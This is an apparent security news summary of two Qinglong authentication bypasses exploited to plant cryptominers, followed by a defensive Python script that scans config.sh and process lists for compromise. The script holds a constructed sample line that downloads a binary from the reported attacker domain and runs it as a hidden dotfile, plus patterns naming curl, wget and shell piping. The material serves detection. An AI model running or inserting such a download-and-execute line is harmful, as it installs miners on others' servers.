Hackers exploited two authentication bypass flaws in the Qinglong open-source task scheduler to deploy cryptominers on developers' servers, with attacks beginning in early February before the issues were publicly disclosed. The issues (CVE-2026-3965 and CVE-2026-4047) stem from a mismatch between middleware authorization and Express.js routing and were properly fixed in PR #2941 after an initial mitigation proved insufficient.
Key points
- Two authentication bypasses (CVE-2026-3965 and CVE-2026-4047) in Qinglong can be chained to achieve remote code execution.
- Exploitation began on publicly exposed Qinglong panels from Feb 7, before public disclosure at the end of February.
- Attackers modified config.sh to download and run cryptominer binaries (saved as /ql/data/db/.fullgc) from file.551911.xyz for multiple architectures.
- The miner process was named ".fullgc" to mimic a harmless Full GC and evade detection while consuming high CPU.
- Maintainers issued an initial mitigation (PR #2924) that was insufficient; the authentication bypass was properly fixed in PR #2941, and users running version 2.20.1 or older should update immediately.
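The points above give a defender two concrete places to look on an exposed Qinglong host: the contents of config.sh and the process table. The following Python script is an added example written for this summary, not code from the Qinglong project or from the original report. It scans a constructed config.sh sample for the download-and-execute pattern described above (the file.551911.xyz domain and the /ql/data/db/.fullgc path are the indicators named on the page) and parses constructed `ps`-style output to flag a hidden dotfile process burning CPU. The regular expressions and the CPU threshold are heuristics chosen here and are assumptions, not the reported attackers' exact commands.

```python
import re

# Constructed sample of a tampered config.sh, modelled on the page's description
# (fetch a binary from the reported domain, drop it as a hidden dotfile, run it).
# This is not the real file from any compromised host.
SAMPLE_CONFIG_SH = """\
## Qinglong config.sh (constructed sample)
RandomDelay="300"
DefaultCronRule=""
curl -fsSL http://file.551911.xyz/x86_64 -o /ql/data/db/.fullgc && chmod +x /ql/data/db/.fullgc && nohup /ql/data/db/.fullgc &
export PATH=/usr/local/bin:$PATH
"""

# Constructed output in the shape of `ps -eo pid,pcpu,comm`.
SAMPLE_PS = """\
  PID %CPU COMMAND
    1  0.0 node
  231 99.3 .fullgc
  244  0.2 bash
"""

IOC_DOMAINS = {"file.551911.xyz"}            # domain named in the report
DOWNLOADERS = re.compile(r"\b(curl|wget)\b")
EXEC_MARKERS = re.compile(r"(chmod\s+\+x|\bnohup\b|\bsh\s+-c\b|\|\s*(ba)?sh\b)")
HIDDEN_BIN = re.compile(r"/ql/data/\S*/\.[A-Za-z0-9_]+")   # dotfile under the data dir (assumed heuristic)
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")


def scan_config_sh(text):
    """Return [(line_number, [reasons])] for lines in config.sh that look like a loader.

    config.sh is meant to hold environment settings; a line that downloads and
    executes something, or references the reported IoCs, is worth an alert.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        reasons = []
        for host in URL_HOST.findall(stripped):
            if host in IOC_DOMAINS:
                reasons.append(f"known IoC domain {host}")
        if DOWNLOADERS.search(stripped) and EXEC_MARKERS.search(stripped):
            reasons.append("download-and-execute chain")
        if HIDDEN_BIN.search(stripped):
            reasons.append("hidden dotfile binary under /ql/data")
        if reasons:
            findings.append((lineno, reasons))
    return findings


def find_miner_processes(ps_output, cpu_threshold=80.0):
    """Return [(pid, comm)] for processes whose name is a hidden dotfile and
    whose CPU share is above cpu_threshold (the threshold is an assumption)."""
    hits = []
    for line in ps_output.splitlines():
        parts = line.split(None, 2)
        if len(parts) != 3 or not parts[0].isdigit():
            continue                      # header or malformed line
        pid, cpu, comm = int(parts[0]), float(parts[1]), parts[2].strip()
        if comm.startswith(".") and cpu >= cpu_threshold:
            hits.append((pid, comm))
    return hits


if __name__ == "__main__":
    for lineno, reasons in scan_config_sh(SAMPLE_CONFIG_SH):
        print(f"config.sh line {lineno}: {', '.join(reasons)}")
    for pid, comm in find_miner_processes(SAMPLE_PS):
        print(f"suspicious process pid={pid} comm={comm}")
```

On a real host, feed the script the actual config.sh and the output of `ps -eo pid,pcpu,comm`; a hit on either check is a reason to treat the panel as compromised rather than merely to kill the process, since the loader line in config.sh will re-run on the next task execution.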